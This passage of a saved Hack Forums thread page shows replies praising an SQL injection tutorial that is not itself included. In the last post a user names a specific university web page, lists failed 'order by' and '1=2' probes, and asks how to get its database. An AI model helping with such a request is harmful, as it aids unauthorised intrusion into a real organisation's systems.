src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 5<br>Posts: 75<br>Joined: Jul 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1907249"><strong class="reputation_positive">1</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35516729">thanks ajkaro for the great TUT (Y) ....i learned new lesson :) </div><div class="post_meta" id="post_meta_35516729"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1907249" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3785325&amp;replyto=35516729" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid35516881" id="pid35516881"></a><table class="tborder" style="margin-top: 5px; " id="post_35516881" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-03-2013, 12:42 PM <span id="edited_by_35516881"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;pid=35516881#pid35516881">#4</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1847579"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/dragonbyrd1.gif" alt="" height="72" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1847579"><span class="group2">sweetoow</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 28<br>Posts: 341<br>Joined: Jun 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1847579"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35516881">Really nice tutorial..<img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/victoire.gif" style="vertical-align: middle;" alt="Victoire" title="Victoire" border="0"><br>learned new things, will try it tomorrow <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/oui.gif" style="vertical-align: middle;" alt="Oui" title="Oui" border="0"><br>thank you very much... <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"></div><div class="post_meta" id="post_meta_35516881"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1847579" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a> </div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3785325&amp;replyto=35516881" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid35517560" id="pid35517560"></a><table class="tborder" style="margin-top: 5px; " id="post_35517560" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-03-2013, 01:22 PM <span id="edited_by_35517560"><span class="smalltext">(This post was last modified: 10-03-2013 01:23 PM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1819381">m4rk0n</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;pid=35517560#pid35517560">#5</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1819381"><span class="group2">m4rk0n</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Mentat<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 22<br>Posts: 279<br>Joined: May 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1819381"><strong class="reputation_positive">7</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35517560">Thanx again for sharing those secrets with us.<br>Now I can participate on those fancy table challenges also (chal 71 now solved).<br><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/smile.gif" style="vertical-align: middle;" alt="Smile" title="Smile" border="0"></div><div class="post_meta" id="post_meta_35517560"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1819381" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3785325&amp;replyto=35517560" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid35524366" id="pid35524366"></a><table class="tborder" style="margin-top: 5px; " id="post_35524366" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-03-2013, 11:12 PM <span id="edited_by_35524366"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;pid=35524366#pid35524366">#6</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1456867"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/0014.gif" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1456867"><span class="group29">Evanescent</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">If you ain't free, no respect !<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 90<br>Posts: 1,121<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1456867"><strong class="reputation_positive">193</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35524366">Amazing bro and congratulations at ub3r <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/smile.gif" style="vertical-align: middle;" alt="Smile" title="Smile" border="0"></div><div class="post_meta" id="post_meta_35524366"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1456867" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3785325&amp;replyto=35524366" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid35525072" id="pid35525072"></a><table class="tborder" style="margin-top: 5px; " id="post_35525072" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-04-2013, 12:55 AM <span id="edited_by_35525072"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;pid=35525072#pid35525072">#7</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1457333"><span class="group2">kimsonha</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Harkonnen<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 13<br>Posts: 165<br>Joined: Sep 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1457333"><strong class="reputation_positive">10</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35525072">So you wrote a tutorial, it's so clean my friend.<br>I've learned something. Thank you for the tutorial.</div><div class="post_meta" id="post_meta_35525072"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1457333" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3785325&amp;replyto=35525072" class="bitButton" rel="nofollow">Quote</a> </div></td></tr></tbody></table><a name="pid35525446" id="pid35525446"></a><table class="tborder" style="margin-top: 5px; " id="post_35525446" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-04-2013, 02:02 AM <span id="edited_by_35525446"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;pid=35525446#pid35525446">#8</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/0fa0f9ce54eb150d907f3e0e35a039cf.png" alt="" height="80" width="80"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=1241186"><span class="group2">hackforumspang</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Sardaukar<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 60<br>Posts: 1,880<br>Joined: Apr 2012<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=1241186"><strong class="reputation_positive">121</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35525446">Stop being so god damn good at SQL. <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br>Very well done, friend.<br><br>Just goes to show how advanced SQLi can be.</div><div class="post_meta" id="post_meta_35525446"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=1241186" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3785325&amp;replyto=35525446" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid35548387" id="pid35548387"></a><table class="tborder" style="margin-top: 5px; " id="post_35548387" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-05-2013, 11:18 AM <span id="edited_by_35548387"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;pid=35548387#pid35548387">#9</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 136<br>Posts: 2,164<br>Joined: Aug 2011 <br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">215</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35548387">Thanks to all for kind words. Happy using <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/pirate.gif" style="vertical-align: middle;" alt="Pirate" title="Pirate" border="0"></div><div class="post_meta" id="post_meta_35548387"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=949543" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3785325&amp;replyto=35548387" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table><a name="pid35615897" id="pid35615897"></a><table class="tborder" style="margin-top: 5px; " id="post_35615897" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">10-09-2013, 06:18 AM <span id="edited_by_35615897"></span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;pid=35615897#pid35615897">#10</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="" width="1"></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=2003378"><span class="group2">sqlemma</span></a></span></strong> <img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Powindah<br><span class="userstars"><img src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/starreg.png" alt="*" border="0"><br></span></span></td><td class="smalltext post_author_info" width="165">Prestige: 0<br>Posts: 11<br>Joined: Oct 2013<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=2003378"><strong class="reputation_neutral">0</strong></a><br></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_35615897">hello:<br>i have some problem ,please help!<br><a href="http://nssp.gatech.edu/faset/plugins/content/index.php?id=35" target="_blank">http://nssp.gatech.edu/faset/plugins/con....php?id=35</a><br>i cannot use "order by" , "1=2" also failed<br>how can we get the db?<br>many thx!</div><div class="post_meta" id="post_meta_35615897"></div></td></tr><tr><td class="trow1 post_buttons "><div class="author_buttons float_left"><a href="http://www.hackforums.net/search.php?action=finduser&amp;uid=2003378" class="bitButton" rel="nofollow" title="Find all posts by this user">Find</a></div><div class="post_management_buttons float_right"><a href="http://www.hackforums.net/newreply.php?tid=3785325&amp;replyto=35615897" class="bitButton" rel="nofollow">Quote</a></div></td></tr></tbody></table></div><table class="tborder" style="border-top-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td colspan="2" class="tfoot"><div><strong>« <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;action=nextoldest" rel="nofollow">Next Oldest</a> | <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;action=nextnewest">Next Newest</a> »</strong></div></td></tr></tbody></table><div class="float_left"><div class="pagination"><span class="pages">Pages (2):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3785325&amp;page=2" class="pagination_next">Next »</a></div></div><div style="padding-top: 4px;" class="float_right"><a href="http://www.hackforums.net/newreply.php?tid=3785325" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a></div><br style="clear: both;"><br><div class="float_left"><ul class="thread_tools"><li class="printable"><a href="http://www.hackforums.net/printthread.php?tid=3785325">View a Printable Version</a></li> <!-- // <li class="sendthread"><a href="sendthread.php?tid=3785325" rel="nofollow">Send this Thread to a Friend</a></li> --><li class="subscription_add"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3785325&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">Subscribe to this thread</a></li></ul></div><div class="float_right" style="text-align: right;"></div><br style="clear: both;"></div><br><div class="bottommenu"><div><span class="smalltext"><a href="http://www.hackforums.net/contact.php">Contact Us</a> | <a href="http://www.hackforums.net/">Hack Forums</a> | <a href="http://www.hackforums.net/archive/index.php/thread-3785325.html">Lite (Archive) Mode</a> | <a href="http://www.hackforums.net/showstaff.php">Staff</a> | <a href="http://www.hackforums.net/myawards.php">Awards</a> | <a href="http://www.hackforums.net/misc.php?action=help&amp;hid=12">Legal Policies</a> | <a href="#top">Top</a></span></div></div><br></div><hr class="hidden"><div id="copyright"><div id="debug"></div><br class="clear"></div></div><br><script src="%5BSQLi%20tutorial%5D%20playing%20with%20SQLi%20output%20data%20-%20Page%201_files/urchin.js" type="text/javascript"></script> <script type="text/javascript">_uacct = "UA-249290-34";
urchinTracker();
</script> <script language="javascript"><!--
bmi_SafeAddOnload(bmi_load,"bmi_orig_img",0);//-->
</script></div></body></html>
<!--//-->